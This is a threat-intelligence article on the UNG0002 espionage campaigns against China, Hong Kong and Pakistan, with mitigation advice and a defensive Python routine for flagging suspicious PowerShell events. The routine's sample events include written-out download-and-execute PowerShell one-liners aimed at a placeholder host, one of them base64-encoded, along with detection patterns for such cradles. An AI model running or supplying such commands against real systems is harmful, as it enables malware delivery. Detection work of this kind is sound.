UNG0002 Targets China, Hong Kong, and Pakistan via LNK Files and RATs in Twin Espionage Campaigns
A sophisticated threat activity cluster tracked as UNG0002 (Unknown Group 0002) has been actively targeting multiple sectors across China, Hong Kong, and Pakistan, deploying twin cyber-espionage operations known as Operation Cobalt Whisper and Operation AmberMist.
According to research from Seqrite Labs, this threat actor shows a strong preference for LNK shortcut files, VBScript, and post-exploitation frameworks such as Cobalt Strike and Metasploit, while using CV- or job-themed decoy documents to lure victims.
Technical Analysis and Impact
Operation Cobalt Whisper (May–Sep 2024)
This campaign used spear-phishing emails with malicious ZIP attachments delivering Cobalt Strike beacons via LNK and VBScript payloads. It primarily targeted the defense, energy, academia, and software development sectors — indicating a focus on intellectual property theft and strategic espionage.
Operation AmberMist (Jan–May 2025)
This campaign delivered INET RAT and the Blister DLL loader through malicious LNK files disguised as resumes.
A variant campaign redirected users to fake Pakistan Ministry of Maritime Affairs landing pages, triggering ClickFix-based PowerShell execution that deployed Shadow RAT.
These multi-stage infection chains demonstrate modular design and persistence, allowing attackers to establish C2 communications, exfiltrate sensitive data, and execute arbitrary commands on compromised hosts.
While attribution remains uncertain, technical overlap suggests a Southeast Asian espionage-driven APT with strong operational consistency and evolving tradecraft.
Mitigation and Defense Recommendations
Organizations across the region should take immediate action to strengthen defenses against UNG0002’s attack techniques:
1. Restrict execution of LNK and VBScript files from untrusted sources.
2. Enhance email security filtering to block spear-phishing attachments and spoofed landing pages.
3. Monitor PowerShell activity for unusual command-line executions (e.g., ClickFix or encoded payloads).
4. Deploy EDR/XDR tools capable of detecting RAT-based persistence and Cobalt Strike beacon behaviors.
5. Apply network segmentation and DNS filtering to prevent lateral movement and outbound C2 communications.
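As an added illustration of recommendation 3, here is a small Python triage routine run over constructed Sysmon-style process-creation events; it is not code from Seqrite Labs or the report. The ClickFix parent-process heuristic (PowerShell spawned by explorer.exe after a paste into the Run dialog), the flag patterns, and the sample command lines are assumptions for this example.

```python
import base64
import re

# Constructed process-creation events (not from the report); fields mirror Sysmon EID 1.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -nop -ep bypass -c \"iex (irm https://example.invalid/verify)\""},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -enc " + base64.b64encode(
         "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/x')"
         .encode("utf-16le")).decode()},
    {"parent": r"C:\Program Files\Vendor\update.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\inventory.ps1"},
]

# -enc/-encodedcommand followed by a base64 blob (PowerShell accepts abbreviated switches).
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
# Flags that hide the window or disable policy/profile, common in one-liner loaders.
STEALTH_RE = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden|-nop\b|-e(?:xecutionpolicy|p)\s+bypass")
# Download-and-execute cmdlets and aliases.
DOWNLOAD_RE = re.compile(r"(?i)\b(?:iex|invoke-expression|irm|invoke-restmethod|invoke-webrequest|downloadstring)\b")

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script (UTF-16LE), or None if absent/invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify_event(ev):
    """Return indicator tags for one PowerShell process-creation event (empty if benign)."""
    if not ev["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return []
    tags, cmd = [], ev["cmdline"]
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        tags.append("encoded_command")
        cmd = cmd + " " + decoded  # inspect the decoded script as well as the raw command line
    if STEALTH_RE.search(cmd):
        tags.append("stealth_flags")
    if DOWNLOAD_RE.search(cmd):
        tags.append("remote_download_exec")
    # Assumed ClickFix signature: user-pasted command, so the parent is explorer.exe.
    if ev["parent"].lower().endswith("explorer.exe") and "remote_download_exec" in tags:
        tags.append("possible_clickfix")
    return tags

def flag_suspicious(events):
    """Return (cmdline, tags) for every event that raised at least one indicator."""
    return [(ev["cmdline"], classify_event(ev)) for ev in events if classify_event(ev)]
```

In production the events would come from Sysmon or PowerShell 4104 script-block logs, and the decoded script should be retained for the analyst rather than only tagged.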
UNG0002 exemplifies the continued evolution of state-linked cyber-espionage in Asia — leveraging simple delivery mechanisms with complex post-exploitation frameworks. Organizations must stay vigilant, patch regularly, and implement layered defense strategies to mitigate evolving threats.